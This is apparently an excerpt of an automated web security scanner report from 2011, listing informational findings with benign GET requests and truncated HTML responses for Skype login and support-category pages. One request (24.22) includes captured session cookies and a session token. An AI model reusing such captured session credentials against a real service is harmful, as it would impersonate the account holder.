HTTP/1.1 200 OK
Connection: close
Date: Sun, 04 Sep 2011 16:31:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: lang=en-us; path=/
Set-Cookie: cc=us; path=/
Set-Cookie: hp_xp=; expires=Mon, 05-Sep-2011 00:31:08 GMT; path=/; secure
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 93095


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="ctl00_ctl00_htmlTag" xmlns="http://www.w3.org/1999/xhtml" lang="e
...[SNIP]...

24.20. https://secure.skype.com/login  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.skype.com
Path:   /login

Request

GET /login HTTP/1.1
Host: secure.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 04 Sep 2011 21:30:27 GMT
Content-Type: text/html
Connection: keep-alive
Set-Cookie: SC=CC=:CCY=:LC=en:LIM=:TM=1315171827:TS=1314118390:TZ=:VAT=:VER=; expires=Mon, 03-Sep-2012 21:30:27 GMT; path=/; domain=.login.ab-testing
X-Stratus-Processing-Time: 0.0491
Set-Cookie: version=ad0dcdedf8; path=/
Vary: User-Agent,Accept-Encoding
Content-Length: 2331

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
...[SNIP]...

24.21. https://support.skype.com/de/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /de/

Request

GET /de/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:37:12 GMT
Content-Type: text/html;charset=utf-8
Content-Language: de
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 62986


<!DOCTYPE html>


<html lang="de" >

<head>

<title>Hilfe f..r Skype ... Nutzerleitf..den, FAQs und Kundendienst</title>
   <meta name="description" content="Hilfe bei der Nutzung von Sk
...[SNIP]...

24.22. https://support.skype.com/en-us/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/

Request

GET /en-us/ HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Cookie: skype-login=hvd1f0nqsu93kvs6dhba2diop2; skype-session-token=94fd441852b9e1046c98536f973599d688791fc3; SC=CC=:CCY=:LC=en-us:LIM=:TM=1314118976:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.114/0; JSESSIONID=8FC8EBA392E9AF68958ED49F2161B548; skypeSessionId=8FC8EBA392E9AF68958ED49F2161B548
Host: support.skype.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 18:08:45 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Content-Length: 64357
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
X-Pad: avoid browser bug


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, user g
...[SNIP]...

24.23. https://support.skype.com/en-us/category/ABOUT_SKYPE/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/category/ABOUT_SKYPE/

Request

GET /en-us/category/ABOUT_SKYPE/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:36:21 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 51928


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, us
...[SNIP]...

24.24. https://support.skype.com/en-us/category/AFFILIATE_PROGRAM/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/category/AFFILIATE_PROGRAM/

Request

GET /en-us/category/AFFILIATE_PROGRAM/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:36:21 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 51651


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, us
...[SNIP]...

24.25. https://support.skype.com/en-us/category/BANK_TRANSFERS/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/category/BANK_TRANSFERS/

Request

GET /en-us/category/BANK_TRANSFERS/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:35:11 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 52289


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, us
...[SNIP]...

24.26. https://support.skype.com/en-us/category/BIZ_VERSION/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/category/BIZ_VERSION/

Request

GET /en-us/category/BIZ_VERSION/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:36:10 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 47680


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, us
...[SNIP]...

24.27. https://support.skype.com/en-us/category/BLACKBERRY/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/category/BLACKBERRY/

Request

GET /en-us/category/BLACKBERRY/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:35:34 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 47667


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, us
...[SNIP]...

24.28. https://support.skype.com/en-us/category/BUYING_ACCESSORIES/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/category/BUYING_ACCESSORIES/

Request

GET /en-us/category/BUYING_ACCESSORIES/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:36:21 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 53814


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, us
...[SNIP]...

24.29. https://support.skype.com/en-us/category/CALLER_IDENTIFICATION/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/category/CALLER_IDENTIFICATION/

Request

GET /en-us/category/CALLER_IDENTIFICATION/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:34:14 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 49444


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, us
...[SNIP]...

24.30. https://support.skype.com/en-us/category/CALLING/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/category/CALLING/

Request

GET /en-us/category/CALLING/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:34:01 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 52171


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, us
...[SNIP]...

24.31. https://support.skype.com/en-us/category/CALLING_PHONES_SKYPEOUT/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/category/CALLING_PHONES_SKYPEOUT/

Request

GET /en-us/category/CALLING_PHONES_SKYPEOUT/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:34:05 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 52239


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, us
...[SNIP]...

24.32. https://support.skype.com/en-us/category/CALL_FORWARDING/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/category/CALL_FORWARDING/

Request

GET /en-us/category/CALL_FORWARDING/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:34:21 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 48876


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, us
...[SNIP]...

24.33. https://support.skype.com/en-us/category/CALL_QUALITY/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/category/CALL_QUALITY/

Request

GET /en-us/category/CALL_QUALITY/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:35:07 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 51095


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, us
...[SNIP]...

24.34. https://support.skype.com/en-us/category/CALL_TRANSFER/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/category/CALL_TRANSFER/

Request

GET /en-us/category/CALL_TRANSFER/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:34:25 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 48963


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, us
...[SNIP]...

24.35. https://support.skype.com/en-us/category/CONFERENCE_CALLING/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/category/CONFERENCE_CALLING/

Request

GET /en-us/category/CONFERENCE_CALLING/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:34:06 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 49565


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, us
...[SNIP]...

24.36. https://support.skype.com/en-us/category/CONNECTION_ISSUES/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/category/CONNECTION_ISSUES/

Request

GET /en-us/category/CONNECTION_ISSUES/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:35:07 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 51271


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, us
...[SNIP]...

24.37. https://support.skype.com/en-us/category/CONTACTS/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/category/CONTACTS/

Request

GET /en-us/category/CONTACTS/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:34:12 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 52203


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, us
...[SNIP]...

24.38. https://support.skype.com/en-us/category/CORDLESS_PHONES/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/category/CORDLESS_PHONES/

Request

GET /en-us/category/CORDLESS_PHONES/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:36:21 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 54642


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, us
...[SNIP]...

24.39. https://support.skype.com/en-us/category/CREDIT_CARDS/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/category/CREDIT_CARDS/

Request

GET /en-us/category/CREDIT_CARDS/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:35:12 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 51425


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, us
...[SNIP]...

24.40. https://support.skype.com/en-us/category/EXTRAS/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/category/EXTRAS/

Request

GET /en-us/category/EXTRAS/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:36:21 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 51144


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, us
...[SNIP]...

24.41. https://support.skype.com/en-us/category/FACEBOOK/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/category/FACEBOOK/

Request

GET /en-us/category/FACEBOOK/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:36:21 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 54249


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, us
...[SNIP]...

24.42. https://support.skype.com/en-us/category/FILE_TRANSFER/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/category/FILE_TRANSFER/

Request

GET /en-us/category/FILE_TRANSFER/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:35:03 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 49220


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, us
...[SNIP]...

24.43. https://support.skype.com/en-us/category/GIFT_CERTIFICATES/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/category/GIFT_CERTIFICATES/

Request

GET /en-us/category/GIFT_CERTIFICATES/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:35:12 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 47693


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, us
...[SNIP]...

24.44. https://support.skype.com/en-us/category/GIROPAY/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/category/GIROPAY/

Request

GET /en-us/category/GIROPAY/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:35:25 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 48703


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, us
...[SNIP]...

24.45. https://support.skype.com/en-us/category/GROUP_VIDEO_CALLING/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/category/GROUP_VIDEO_CALLING/

Request

GET /en-us/category/GROUP_VIDEO_CALLING/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:34:28 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 49809


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, us
...[SNIP]...

24.46. https://support.skype.com/en-us/category/INSTANT_MESSAGING_WITH_SKYPE/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/category/INSTANT_MESSAGING_WITH_SKYPE/

Request

GET /en-us/category/INSTANT_MESSAGING_WITH_SKYPE/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:35:00 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 51357


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, us
...[SNIP]...

24.47. https://support.skype.com/en-us/category/MONEYBOOKERS/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/category/MONEYBOOKERS/

Request

GET /en-us/category/MONEYBOOKERS/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:35:13 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 48690


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, us
...[SNIP]...

24.48. https://support.skype.com/en-us/category/MYSPACEIM_WITH_SKYPE/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/category/MYSPACEIM_WITH_SKYPE/

Request

GET /en-us/category/MYSPACEIM_WITH_SKYPE/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:36:29 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 50650


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, us
...[SNIP]...

24.49. https://support.skype.com/en-us/category/ONLINE_NUMBER_SKYPEIN/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/category/ONLINE_NUMBER_SKYPEIN/

Request

GET /en-us/category/ONLINE_NUMBER_SKYPEIN/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:34:10 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 51547


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, us
...[SNIP]...

24.50. https://support.skype.com/en-us/category/PAYMENT_PRICES/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/category/PAYMENT_PRICES/

Request

GET /en-us/category/PAYMENT_PRICES/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:35:11 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 53065


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, us
...[SNIP]...

24.51. https://support.skype.com/en-us/category/PAYPAL/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/category/PAYPAL/

Request

GET /en-us/category/PAYPAL/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:35:14 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 48664


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, us
...[SNIP]...

24.52. https://support.skype.com/en-us/category/PAYSAFECARD/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/category/PAYSAFECARD/

Request

GET /en-us/category/PAYSAFECARD/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:35:16 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 48722


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, us
...[SNIP]...

24.53. https://support.skype.com/en-us/category/PERSONALISE_SKYPE/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/category/PERSONALISE_SKYPE/

Request

GET /en-us/category/PERSONALISE_SKYPE/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:36:21 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 50589


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, us
...[SNIP]...

24.54. https://support.skype.com/en-us/category/PREPAID_CARDS/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/category/PREPAID_CARDS/

Request

GET /en-us/category/PREPAID_CARDS/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:35:17 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 48252


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, us
...[SNIP]...

24.55. https://support.skype.com/en-us/category/PRIVACY__SECURITY/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/category/PRIVACY__SECURITY/

Request

GET /en-us/category/PRIVACY__SECURITY/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:35:31 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 53348


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, us
